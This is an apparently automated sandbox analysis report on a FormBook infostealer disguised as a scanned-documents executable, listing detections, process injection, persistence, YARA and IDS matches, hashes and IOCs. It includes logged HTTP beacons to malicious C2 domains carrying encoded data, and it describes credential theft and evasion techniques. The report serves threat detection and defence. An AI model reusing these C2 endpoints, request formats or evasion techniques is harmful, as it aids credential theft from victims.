
Windows Analysis Report
Scanned Docs from Emnes Metal Sdn Bhd_.exe

Overview

General Information

Sample name: Scanned Docs from Emnes Metal Sdn Bhd_.exe
Analysis ID: 1488022
MD5: 75d0bfd0499f3bb0c94a45a80e92476b
SHA1: af86c882a44b250a8dc8a3c116eee075351740d0
SHA256: b12b14169932a016209c31797d3a3d18a151f15615e9dc7345d36498fb7e6d07
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Scanned Docs from Emnes Metal Sdn Bhd_.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe" MD5: 75D0BFD0499F3BB0C94A45A80E92476B)
    • svchost.exe (PID: 6744 cmdline: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • MHFAGZiftf.exe (PID: 2872 cmdline: "C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • schtasks.exe (PID: 7032 cmdline: "C:\Windows\SysWOW64\schtasks.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
          • MHFAGZiftf.exe (PID: 2056 cmdline: "C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1508 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source / Rule / Description / Author / Strings):
  • Source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
  • Source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp
    Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
    Strings: 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x17462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • Source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
  • Source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp
    Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
    Strings: 0x2a790:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • Source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
  • 11 further memory-dump entries are not shown in this view.

Yara matches in unpacked PE files (Source / Rule / Description / Author / Strings):
  • Source: 1.2.svchost.exe.400000.0.unpack
    Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
  • Source: 1.2.svchost.exe.400000.0.unpack
    Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
    Strings: 0x2cff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x16662:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • Source: 1.2.svchost.exe.400000.0.raw.unpack
    Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
  • Source: 1.2.svchost.exe.400000.0.raw.unpack
    Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
    Strings: 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x17462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Sigma rule matches:
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", CommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", ParentImage: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe, ParentProcessId: 6696, ParentProcessName: Scanned Docs from Emnes Metal Sdn Bhd_.exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", ProcessId: 6744, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", CommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", ParentImage: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe, ParentProcessId: 6696, ParentProcessName: Scanned Docs from Emnes Metal Sdn Bhd_.exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", ProcessId: 6744, ProcessName: svchost.exe
Network IDS alerts (all entries: Destination Port 80, Protocol TCP, Classtype "A Network Trojan was detected"):

Timestamp                         SID      Source Port  Destination Port  Protocol  Classtype
2024-08-05T15:33:46.610247+0200   2855465  55438        80                TCP       A Network Trojan was detected
2024-08-05T15:30:29.366717+0200   2855465  55446        80                TCP       A Network Trojan was detected
2024-08-05T15:32:44.348060+0200   2855464  55419        80                TCP       A Network Trojan was detected
2024-08-05T15:32:24.598271+0200   2855465  55414        80                TCP       A Network Trojan was detected
2024-08-05T15:34:41.642470+0200   2855464  55445        80                TCP       A Network Trojan was detected
2024-08-05T15:33:11.869360+0200   2855464  55427        80                TCP       A Network Trojan was detected
2024-08-05T15:33:33.481112+0200   2855465  55434        80                TCP       A Network Trojan was detected
2024-08-05T15:31:37.858823+0200   2855464  55400        80                TCP       A Network Trojan was detected
2024-08-05T15:34:06.742130+0200   2855464  55441        80                TCP       A Network Trojan was detected
2024-08-05T15:32:32.758756+0200   2855464  55416        80                TCP       A Network Trojan was detected
2024-08-05T15:31:48.976689+0200   2855464  55403        80                TCP       A Network Trojan was detected
2024-08-05T15:33:14.394961+0200   2855464  55428        80                TCP       A Network Trojan was detected
2024-08-05T15:32:11.243024+0200   2855465  55410        80                TCP       A Network Trojan was detected
2024-08-05T15:33:44.056357+0200   2855464  55437        80                TCP       A Network Trojan was detected
2024-08-05T15:33:41.525809+0200   2855464  55436        80                TCP       A Network Trojan was detected
2024-08-05T15:31:42.990832+0200   2855465  55402        80                TCP       A Network Trojan was detected
2024-08-05T15:34:36.179851+0200   2855464  55443        80                TCP       A Network Trojan was detected
2024-08-05T15:33:25.855659+0200   2855464  55431        80                TCP       A Network Trojan was detected
2024-08-05T15:32:46.883713+0200   2855464  55420        80                TCP       A Network Trojan was detected
2024-08-05T15:34:29.154258+0200   2855465  55442        80                TCP       A Network Trojan was detected
2024-08-05T15:33:16.945128+0200   2855464  55429        80                TCP       A Network Trojan was detected
2024-08-05T15:32:57.776739+0200   2855464  55423        80                TCP       A Network Trojan was detected
2024-08-05T15:32:51.923298+0200   2855465  55422        80                TCP       A Network Trojan was detected
2024-08-05T15:33:00.271451+0200   2855464  55424        80                TCP       A Network Trojan was detected
2024-08-05T15:31:57.075925+0200   2855465  55406        80                TCP       A Network Trojan was detected
2024-08-05T15:33:02.853794+0200   2855464  55425        80                TCP       A Network Trojan was detected
2024-08-05T15:32:30.095906+0200   2855464  55415        80                TCP       A Network Trojan was detected
2024-08-05T15:31:54.186142+0200   2855464  55405        80                TCP       A Network Trojan was detected
2024-08-05T15:31:51.526601+0200   2855464  55404        80                TCP       A Network Trojan was detected
2024-08-05T15:33:05.338981+0200   2855465  55426        80                TCP       A Network Trojan was detected
2024-08-05T15:34:38.715086+0200   2855464  55444        80                TCP       A Network Trojan was detected
2024-08-05T15:32:35.190410+0200   2855464  55417        80                TCP       A Network Trojan was detected
2024-08-05T15:34:04.213661+0200   2855464  55440        80                TCP       A Network Trojan was detected
2024-08-05T15:32:07.823386+0200   2855464  55409        80                TCP       A Network Trojan was detected
2024-08-05T15:31:40.563497+0200   2855464  55401        80                TCP       A Network Trojan was detected
2024-08-05T15:34:01.680859+0200   2855464  55439        80                TCP       A Network Trojan was detected
2024-08-05T15:32:38.674646+0200   2855465  55418        80                TCP       A Network Trojan was detected
2024-08-05T15:33:19.469697+0200   2855465  55430        80                TCP       A Network Trojan was detected
2024-08-05T15:32:16.991396+0200   2855464  55411        80                TCP       A Network Trojan was detected
2024-08-05T15:33:38.983279+0200   2855464  55435        80                TCP       A Network Trojan was detected
2024-08-05T15:31:35.346636+0200   2855464  55399        80                TCP       A Network Trojan was detected
2024-08-05T15:33:30.940025+0200   2855464  55433        80                TCP       A Network Trojan was detected
2024-08-05T15:32:19.546018+0200   2855464  55412        80                TCP       A Network Trojan was detected
2024-08-05T15:32:22.070909+0200   2855464  55413        80                TCP       A Network Trojan was detected
2024-08-05T15:31:17.205288+0200   2855465  55397        80                TCP       A Network Trojan was detected
2024-08-05T15:32:05.273764+0200   2855464  55408        80                TCP       A Network Trojan was detected
2024-08-05T15:32:02.700047+0200   2855464  55407        80                TCP       A Network Trojan was detected
2024-08-05T15:32:49.398527+0200   2855464  55421        80                TCP       A Network Trojan was detected
2024-08-05T15:33:28.389390+0200   2855464  55432        80                TCP       A Network Trojan was detected


            AV Detection

Source: http://www.rtrpodcast.online/l2ei/; Avira URL Cloud: Label: malware
Source: http://www.tqfabxah.com/zjwj/; Avira URL Cloud: Label: malware
Source: http://www.tqfabxah.com/zjwj/?efM=nHLCZn8vN2ArVDTtuX5SJ0P/P5D3rwrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZBj+QLQEglA9+lHyHnT+4OAarv/Cw0xbxNAM=&GTP=uhqpjxIPh; Avira URL Cloud: Label: malware
Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe; ReversingLabs: Detection: 71%
Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe; Joe Sandbox ML: detected
Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000001.00000003.1919524011.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919657751.0000000003649000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015BB000.00000004.00000001.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015E4000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MHFAGZiftf.exe, 00000003.00000002.4110802051.000000000021E000.00000002.00000001.01000000.00000005.sdmp, MHFAGZiftf.exe, 00000007.00000000.2021295588.000000000021E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655348276.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655471454.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1853902441.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851162976.0000000003800000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1951317071.000000000332F000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.0000000003680000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.000000000381E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1953664932.00000000034D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655348276.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655471454.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1951185289.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1853902441.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851162976.0000000003800000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000003.1951317071.000000000332F000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.0000000003680000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.000000000381E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1953664932.00000000034D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4112702566.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4111169499.0000000003113000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2240961982.000000000199C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000001.00000003.1919524011.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919657751.0000000003649000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015BB000.00000004.00000001.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015E4000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.4112702566.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4111169499.0000000003113000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2240961982.000000000199C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe; Code function: 0_2_002EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_002EDBBE
Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe; Code function: 0_2_002F68EE FindFirstFileW,FindClose, 0_2_002F68EE
Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe; Code function: 0_2_002F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_002F698F
Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe; Code function: 0_2_002ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_002ED076
Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe; Code function: 0_2_002ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_002ED3A9
Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe; Code function: 0_2_002F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_002F9642
Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe; Code function: 0_2_002F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_002F979D
Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe; Code function: 0_2_002F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_002F9B2B
Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe; Code function: 0_2_002F5C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_002F5C97
Source: C:\Windows\SysWOW64\schtasks.exe; Code function: 4_2_02B2BAB0 FindFirstFileW,FindNextFileW,FindClose, 4_2_02B2BAB0
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 4x nop then xor esi, esi 1_2_004182BA
Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe; Code function: 4x nop then xor esi, esi 3_2_03E9C195
Source: C:\Windows\SysWOW64\schtasks.exe; Code function: 4x nop then xor eax, eax 4_2_02B19720
Source: C:\Windows\SysWOW64\schtasks.exe; Code function: 4x nop then xor esi, esi 4_2_02B24C57
Source: C:\Windows\SysWOW64\schtasks.exe; Code function: 4x nop then mov ebx, 00000004h 4_2_03320548
Source: Joe Sandbox View; IP Address: 217.116.0.191
Source: Joe Sandbox View; IP Address: 76.223.67.189
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 identical entries)
Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe; Code function: 0_2_002FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 0_2_002FCE44
Source: global traffic; HTTP traffic detected: GET /toda/?GTP=uhqpjxIPh&efM=obOL9JCgNxwS4++cuMdB8oKy9gH02j2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPeZjD4+ekebMUnDMBnOUVwsozzcXjkZdwt+Kw= HTTP/1.1 | Host: www.stemfiniti.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
Source: global traffic; HTTP traffic detected: GET /pjmu/?efM=zh3d17Jww7lUdSTn18h3AW52xQeHiultGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GYgJ6QddEnX3CYXXMD+mGHjpcx+XzQAKiSmY=&GTP=uhqpjxIPh HTTP/1.1 | Host: www.zhuan-tou.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
Source: global traffic; HTTP traffic detected: GET /7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc= HTTP/1.1 | Host: www.lecoinsa.net | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
Source: global traffic; HTTP traffic detected: GET /1nsp/?efM=6szqGuj1zCBS7eEVX649iJVBUL/fWzE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080Ir9qaLZUnG7yNOEpMTkzRXgFx77GcbRli0I=&GTP=uhqpjxIPh HTTP/1.1 | Host: www.8xbe578.app | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
Source: global traffic; HTTP traffic detected: GET /8unq/?GTP=uhqpjxIPh&efM=RkvL3PdT4df/OPkNHI4HmdhQbyPIEJeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6mviVClJubTHF4ksIetQZZ+rgXL6Dldbwq0cw= HTTP/1.1 | Host: www.synergon.space | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
Source: global traffic; HTTP traffic detected: GET /7ie4/?efM=dUG4+DDdp/sjDloXxs11bKdjpfE9KTK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLz246S+DRLpxSbmoiTCF0OJgE4T3/Jv+1c2k=&GTP=uhqpjxIPh HTTP/1.1 | Host: www.alanbeanart.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
Source: global traffic; HTTP traffic detected: GET /rdfm/?GTP=uhqpjxIPh&efM=wrkGspiQ383g8BvQawprffb7FcgpmXJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvZFoLMOaF6UBG/sMUSe6LmxyUxmV5i7nd1eA= HTTP/1.1 | Host: www.kacotae.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
Source: global traffic; HTTP traffic detected: GET /irn0/?efM=rkk12BbGqxBZ8yyVdqr4fumsqySnbS/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdycpy6GTweDeod91OQcupKfuQbLLwzDVUdZDA=&GTP=uhqpjxIPh HTTP/1.1 | Host: www.slushcafe.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
Source: global traffic; HTTP traffic detected: GET /mpex/?GTP=uhqpjxIPh&efM=Zb/vXsPYNAfjWKU5b+Nt30TyxsxOl11zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3DCw+G1Vpb7KEKzC8l577KkftecMR999sDYI= HTTP/1.1 | Host: www.a9jcpf.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
Source: global traffic; HTTP traffic detected: GET /zjwj/?efM=nHLCZn8vN2ArVDTtuX5SJ0P/P5D3rwrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZBj+QLQEglA9+lHyHnT+4OAarv/Cw0xbxNAM=&GTP=uhqpjxIPh HTTP/1.1 | Host: www.tqfabxah.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /l2ei/?GTP=uhqpjxIPh&efM=2NxpSnefRSOpgA+BoOniz/1uTtrxzrfiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINxooKAGgJDCdVs948iDsg681FEAENC5VGkiM= HTTP/1.1Host: www.rtrpodcast.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
